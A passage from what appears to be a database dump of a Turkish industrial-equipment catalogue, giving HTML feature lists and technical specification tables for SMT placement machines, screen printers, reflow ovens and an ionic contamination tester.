&ccedil;ubuk (Frekans ve g&uuml;&ccedil;ayarlanabilir)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Matrix Tray</p>\r\n</td>\r\n<td>\r\n<p>Tepsi sabitleyiciler</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Lazer Hizalama</p>\r\n</td>\r\n<td width=\"335\">\r\n<p>Opsiyon</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Vision Sistemi</p>\r\n</td>\r\n<td width=\"335\">\r\n<p>Cognex Vision</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dispenser Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>10.000 nokta/saat</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Boyutlar</p>\r\n</td>\r\n<td>\r\n<p>W 1016 mm x D 1321mm x H 1346.2mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>&nbsp;</p>\r\n</td>\r\n<td>\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','LS60V','','','','ls60v'),(10,'SMD P&P - 23,000cph','<h2 style=\"text-align: left;\">Panasonic Orta/Yüksek Hızlı Dizgi Makinesi </h2>\r\n<ul style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; text-align: start;\">\r\n<li>Orta/Yüksek hacimli işletmeler için gelişmiş teknolojili SMT dizgi sistemidir</li>\r\n<li>Tek makine ile komple çözüm</li>\r\n<li>Sınıfındaki en iyi grafik arayüz ile dakikalar içinde kolay programlama</li>\r\n<li>01005 ile 150x25mm konnektörlerin dizgisi</li>\r\n<li>Kapalı çevrim ile kontrol edilen hassas dizgi kafası</li>\r\n<li>120 adete kadar 8mm besleyici kapasitesi</li>\r\n</ul>\r\n<p> </p>\r\n<p> </p>\r\n<table id=\"zebra-blue\" style=\"margin-left: 30px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Kafa Yapısı</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">1 kafa / 14 nozzles</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Üretkenlik</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">35,800cph (IPC9850：23,000cph)</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Malzemeler</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">01005”～120×90mm</p>\r\n<p style=\"margin-left: 30px;\">150×25mm (Konnektör)</p>\r\n<p style=\"margin-left: 30px;\">H=28mm, W=30g</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Maks PCB boyutları</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Standart: ～510 x 460mm</p>\r\n<p style=\"margin-left: 30px;\">Uzun pcb spekleri: ～1500 x 460mm</p>\r\n<p style=\"margin-left: 30px;\">* Uzun pcb boyutları için, bizlerle temasa geçiniz ltf.</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Feeder slot</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Maks 80 slot (160 input / 8mm)</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Feeder</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">NPM / CM feeder</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Boyutlar</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">1970 (G) x 2019 (D) x 1500 (Y) mm</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Voltaj</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">3-faz AC 380</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Pnömatik</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">0.5 MPa - 0.8MPa 200 L/min (A.N.R.)</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Ağırlık</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">2650kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','AM100','','','','am100'),(56,'Screen Printer - Automatic','<h2 style=\"text-align: left;\"><span style=\"color: #333399; font-family: Tahoma, Helvetica, Arial, sans-serif;\">Panasonic SPG Automatic Screen Printer</span></h2>\r\n<p> </p>\r\n<ul>\r\n<li>\r\n<p style=\"text-align: left;\">Uni-Floating baskı metodu ile kartın eğikliğinden bağımsız mükemmel dolgu performansı</p>\r\n</li>\r\n</ul>\r\n<ul>\r\n<li style=\"text-align: left;\"><span style=\"position: absolute; left: -53.1719px;\"><br /></span>Hafif temizlik yöntemi ile açıklıklardaki flux kurumaz ve kararlı miktarda lehim geçişi sağlanır</li>\r\n<li style=\"text-align: left;\">\r\n<p>Gelişmiş bıçak yapısı lehimin baskı alanı dışına çıkmasını engeller ve lehim israfını önler</p>\r\n</li>\r\n<li>\r\n<p class=\"O\" style=\"text-align: left;\">Geniş baskı veritabanı ile baskı parametreleri otomatik ayarlanır</p>\r\n</li>\r\n</ul>\r\n<p> </p>\r\n<p> </p>\r\n<table id=\"zebra-blue\" style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; width: 463px; border-collapse: collapse; margin-left: 30px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"height: 17.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"23\">MODEL ADI</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">SPG</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Model No</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">NM-EJP6A</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">PCB Boyutları</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">L 50mm x W 50mm -  L 510mm x W 460mm</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Döngü Zamanı</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">6.5 sn + Baskı Süresi</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Hassasiyet</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">±12.5 µm</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Çerçeve Boyutları</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">L 736 x W 736, L 650 x W 550 (Dikey Durumda)</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Güç Kaynağı</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">1 faz AC 200 V  1.4 kVA</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Hava Kaynağı</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">0,5 MPa, 30 L/min (A.N.R)</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Boyutlar</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">W 1580 mm x D 1800mm x H 1500mm</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Ağırlık</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">1500kg</td>\r\n</tr>\r\n</tbody>\r\n</table>','SPG','','','','spg'),(11,'Screen Printer - Automatic','<p style=\"text-align: left;\">&nbsp;</p>\r\n<h5 style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">Panasonic SP18P-L Tam Otomatik Screen Printer</h5>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p>&nbsp;</p>\r\n<table style=\"font-family: Tahoma, Helvetica, Arial, sans-serif;\" border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\"><img src=\"images/panasonic/PANA_sp18.gif\" alt=\"\" border=\"0\" />&nbsp;</td>\r\n<td style=\"font-size: 10px;\">\r\n<ul>\r\n<ul>&nbsp;</ul>\r\n<li>\r\n<div class=\"O\"><span style=\"position: absolute; left: -53.171875px;\">?</span><span style=\"font-size: 10pt;\">Uni-Floating baskı metodu ile kartın eğikliğinden bağımsız mükemmel dolgu performansı</span></div>\r\n</li>\r\n</ul>\r\n<ul>\r\n<li>\r\n<div class=\"O\"><span style=\"font-size: 6px;\"><span style=\"position: absolute; left: -53.171875px;\">?</span></span><span style=\"font-size: 10pt;\">Hafif temizlik yöntemi ile açıklıklardaki flux kurumaz ve kararlı miktarda lehim geçişi&nbsp;sağlanır</span></div>\r\n</li>\r\n<li>\r\n<div class=\"O\"><span style=\"font-size: 6px;\"><span style=\"position: absolute; left: -53.171875px;\">?</span></span><span style=\"font-size: 10pt;\">Gelişmiş bıçak yapısı lehimin baskı alanı dışına çıkmasını engeller ve lehim israfını önler</span></div>\r\n</li>\r\n<li>\r\n<div class=\"O\"><span style=\"font-size: 6px;\"><span style=\"position: absolute; left: -53.171875px;\">?</span></span><span style=\"font-size: 10pt;\">Geniş baskı veritabanı ile baskı parametreleri otomatik ayarlanır</span></div>\r\n</li>\r\n<li>\r\n<p><span style=\"font-size: 10pt;\">&nbsp;</span></p>\r\n</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; width: 463px; border-collapse: collapse; margin-left: 30px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"height: 17.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"23\">MODEL ADI</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">SP18P-L</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Model No</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">NM-EJP1A</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">PCB Boyutları</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">L 50mm x W 50mm -&nbsp; L 510mm x W 460mm</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Döngü Zamanı</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">8&nbsp;sn + Baskı Süresi</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Hassasiyet</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">±12.5 µm</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Çerçeve Boyutları</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">L 736 x W 736, L 650 x W 550 (Dikey Durumda)</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Güç Kaynağı</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">1 faz AC 200 V&nbsp; 1.4 kVA</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Hava Kaynağı</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">0,5 MPa, 30 L/min (A.N.R)</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Boyutlar</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">W 1100 mm x D 1536mm x H 1430mm</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Ağırlık</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">1250kg</td>\r\n</tr>\r\n</tbody>\r\n</table>','SP-18P-L','','','','sp-18p-l'),(12,'Screen Printer - Yarı-otomatik','<h5 style=\"text-align: left;\"><span style=\"font-size: 0.83em; color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">ASP-300 Yarı Otomatik Screen Printer</span></h5>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\">&nbsp;<img src=\"images/tolo/T_asp-300_m.jpg\" alt=\"\" /></td>\r\n<td style=\"font-size: 10px;\">&nbsp;\r\n<div class=\"O\">\r\n<div>&nbsp;</div>\r\n<ul>\r\n<li><span style=\"font-size: 10pt;\"><strong>Güvenilir-Hassas Lehimleme</strong></span></li>\r\n<li><span style=\"font-size: 10pt;\"><strong>Motorlu baskı kafa hareketi&nbsp;</strong></span></li>\r\n<li><span style=\"font-size: 10pt;\"><strong>Kolay kullanım ve bakım&nbsp;</strong></span></li>\r\n<li><span style=\"font-size: 10pt;\"><strong>Giriş ve Orta ölçekli uygulamalarda&nbsp;&nbsp;yüksek performans</strong></span></li>\r\n</ul>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p>&nbsp;</p>\r\n<table style=\"margin-left: 30px;\" dir=\"ltr\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td>\r\n<div style=\"margin-left: 30px;\">Model İsmi</div>\r\n</td>\r\n<td>\r\n<div style=\"margin-left: 30px;\">TOLO ASP-300</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Baskı Alanı</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">300mm x 400 mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Çerçeve Genişliği</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">370*470- 550*650mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Masa Ayarlaması</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">+/- 10mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Baskı Hassasiyeti</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">0.02 mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Tekrarlama Hassasiyeti</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">0.02 mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Fine Pitch</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">0.3 mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">PCB Boyutu</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Max: 350*330mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">PCB Kalınlığı</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">0.2 ? 2.0 mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Hava Kaynağı</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">4-6 kg /cm²</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Güç Kaynağı</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">AC 220V 50 HZ</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Uzunluk</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">900 mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Genişlik</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">900 mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Yükseklik</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">1650 mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"136\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Ağırlık</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"195\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">250kg</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','ASP-300','','','','asp-300'),(13,'Reflow Fırın - 8-zone','<h2>TOLO LY-8C SMD REFLOW FIRIN</h2>\r\n<ul>\r\n<li>\r\n<p style=\"text-align: left;\">Zincir ve Mesh Konvey&ouml;r ile senkronize &ccedil;alışabilme</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>&Ouml;zel dizaynı sayesinde sabit &uuml;fleme hızı</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>S&uuml;per Kaliteli Al&uuml;minyum alaşımlı raylar</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>Otomatik Yağlama Sistemi</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>20 dakikadan daha kısa s&uuml;rede hızlı ısı y&uuml;kselişi</p>\r\n</li>\r\n<li>\r\n<p style=\"text-align: left;\">G&uuml;&ccedil; kesintilerine karşı koruma</p>\r\n</li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" dir=\"ltr\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>Model İsmi</td>\r\n<td>TOLO LY-8C</td>\r\n</tr>\r\n<tr>\r\n<td>Isıtıcı Uzunluğu</td>\r\n<td>2953&nbsp;mm</td>\r\n</tr>\r\n<tr>\r\n<td>Isıtma B&ouml;lge Sayısı</td>\r\n<td>8</td>\r\n</tr>\r\n<tr>\r\n<td>Soğutma B&ouml;lge Sayısı</td>\r\n<td>2</td>\r\n</tr>\r\n<tr>\r\n<td>Isı&nbsp;Derecesi</td>\r\n<td>300 &ordm;C</td>\r\n</tr>\r\n<tr>\r\n<td>Isı&nbsp;Hassasiyeti</td>\r\n<td>&plusmn;&nbsp;1 &ordm;C</td>\r\n</tr>\r\n<tr>\r\n<td>Isı&nbsp;Sapması</td>\r\n<td>&plusmn;&nbsp;2 &ordm;C</td>\r\n</tr>\r\n<tr>\r\n<td>Soğutma Tipi</td>\r\n<td>Air cooling</td>\r\n</tr>\r\n<tr>\r\n<td>Konveyor Y&uuml;ksekliği</td>\r\n<td>900&plusmn;&nbsp;20 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Konveyor Tipi</td>\r\n<td>Zincir ve Mesh</td>\r\n</tr>\r\n<tr>\r\n<td>PCB Boyutları</td>\r\n<td>70-400 mm(W)</td>\r\n</tr>\r\n<tr>\r\n<td>PCB Transfer Y&ouml;n&uuml;</td>\r\n<td>L-&gt;R (R-&gt;L)</td>\r\n</tr>\r\n<tr>\r\n<td>Konveyor Hızı</td>\r\n<td>0-1200 mm/min</td>\r\n</tr>\r\n<tr>\r\n<td>Zincir genişlik aralığı</td>\r\n<td>70-400 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Mesh genişliği</td>\r\n<td>460 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Enerji Kontrol&uuml;</td>\r\n<td>UPS (Konveyor ve PC)</td>\r\n</tr>\r\n<tr>\r\n<td>G&uuml;&ccedil;&nbsp;Kaynağı</td>\r\n<td>AC 3?380V 50 hz</td>\r\n</tr>\r\n<tr>\r\n<td>&Ccedil;alışma&nbsp;&nbsp;/ Başlangı&ccedil; G&uuml;c&uuml;</td>\r\n<td>7.5 /28 KW</td>\r\n</tr>\r\n<tr>\r\n<td>Boyutları</td>\r\n<td>5100Lx1280Wx1580H</td>\r\n</tr>\r\n<tr>\r\n<td>Net Ağırlık</td>\r\n<td>1300 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>','LY-8C','','','','ly-8c'),(47,'Temizlik (Kontaminasyon) Testi','<h5 style=\"text-align: left;\">Zero-Ion G3 - Ionic Kontaminasyon (Temizlik) Test Makinesi&nbsp;</h5>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<ul>\r\n<li style=\"text-align: left;\">MIL-STD-200A, MIL-P-28809, IPC-001 TM650 Standartlarına uygundur</li>\r\n<li style=\"text-align: left;\">Windows İşletim Sistemi</li>\r\n<li style=\"text-align: left;\">Dinamik Ölçüm Teknolojisi</li>\r\n<li style=\"text-align: left;\">No-clean fluxlardaki zayıf ion aktivatörlerini algılar</li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p>&nbsp;</p>\r\n<table cellspacing=\"0\">\r\n<tbody>\r\n<tr><th>Özellikler</th><th>Zero Ion G3 12</th><th>Zero Ion G3 18</th><th>Zero Ion G3 24</th></tr>\r\n<tr>\r\n<td>Boyutlar</td>\r\n<td>28\" x 53 1/4\" x 53\"</td>\r\n<td>28\" x 53 1/4\" x 53\"</td>\r\n<td>28\" x 53 1/4\" x 53\"</td>\r\n</tr>\r\n<tr>\r\n<td>Ağırlık</td>\r\n<td>288 lbs</td>\r\n<td>288 lbs</td>\r\n<td>288 lbs</td>\r\n</tr>\r\n<tr>\r\n<td>Elektriksel</td>\r\n<td>220VAC, 5 Amps,<br />Tek Faz</td>\r\n<td>220VAC, 5 Amps,<br />Tek Faz</td>\r\n<td>220VAC, 5 Amps,<br />Tek Faz</td>\r\n</tr>\r\n<tr>\r\n<td>Test Hücre Boyutları</td>\r\n<td>12”x12”</td>\r\n<td>18”x18”</td>\r\n<td>24”x24”</td>\r\n</tr>\r\n<tr>\r\n<td>Test Metodu</td>\r\n<td>Hepsi</td>\r\n<td>Hepsi</td>\r\n<td>Hepsi</td>\r\n</tr>\r\n<tr>\r\n<td>Kontrol</td>\r\n<td>All-in-One PC</td>\r\n<td>All-in-One PC</td>\r\n<td>All-in-One PC</td>\r\n</tr>\r\n<tr>\r\n<td>Arayüz</td>\r\n<td>18.5\" (46.99cm) LCD</td>\r\n<td>18.5\" (46.99cm) LCD</td>\r\n<td>18.5\" (46.99cm) LCD</td>\r\n</tr>\r\n<tr>\r\n<td>ESD Counter Top</td>\r\n<td>Standart</td>\r\n<td>Standart</td>\r\n<td>Standart</td>\r\n</tr>\r\n<tr>\r\n<td>Test Sıvısı</td>\r\n<td>75% IPA / 25% DI</td>\r\n<td>75% IPA / 25% DI</td>\r\n<td>75% IPA / 25% DI</td>\r\n</tr>\r\n<tr>\r\n<td>Auto Print ve SPC<br />Veri Depolama</td>\r\n<td>Standart</td>\r\n<td>Standart</td>\r\n<td>Standart</td>\r\n</tr>\r\n<tr>\r\n<td>Dinamik Filtrasyon</td>\r\n<td>Standart</td>\r\n<td>Standart</td>\r\n<td>Standart</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>','Zero Ion - G3','','','','zero-ion-g3'),(14,'SMT Reflow Fırın - Masaüstü','<h2 >GF-12-HC/HT&nbsp;Masa&uuml;st&uuml; SMT Reflow Fırın</h2>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<ul style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; text-align: start;\">\r\n<li>D&uuml;ş&uuml;k hacimli ve prototip &uuml;retimler i&ccedil;in \'Horizontal Convection\' ısıtma teknolojili masa&uuml;st&uuml; SMT lehimleme &ccedil;&ouml;z&uuml;m&uuml;</li>\r\n<li>Kurşunsuz lehimlemeye uygun</li>\r\n<li>Alt/&Uuml;st ısıtıcılı 3 Kabin + soğutma kabini</li>\r\n<li>Paslanmaz &ccedil;elik konvey&ouml;r ve ısıtıcı kabinler</li>\r\n<li>Ger&ccedil;ek zamanlı grafik sıcaklık g&ouml;sterimi ile kartın ısı profilinin belirlenmesine yardımcı olur</li>\r\n<li>Nitrojen opsiyonu</li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n<table id=zebra-blue border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td >MODEL ADI</td>\r\n<td>GF-12-HC/HT</td>\r\n</tr>\r\n<tr >\r\n<td >Maksimum Kart Boyutları</td>\r\n<td >305mm x 305mm</td>\r\n</tr>\r\n<tr >\r\n<td >Maksimum Kart Y&uuml;ksekliği</td>\r\n<td >35mm</td>\r\n</tr>\r\n<tr >\r\n<td >Isıtma Kabini</td>\r\n<td>3 &Uuml;st + 3 Alt</td>\r\n</tr>\r\n<tr>\r\n<td >Maksimum Sıcaklık</td>\r\n<td >HC: 250&ordm;C / HT: 350&ordm;C</td>\r\n</tr>\r\n<tr >\r\n<td >Isıtma T&uuml;nel Uzunluğu</td>\r\n<td >660mm</td>\r\n</tr>\r\n<tr style=\"margin-left: 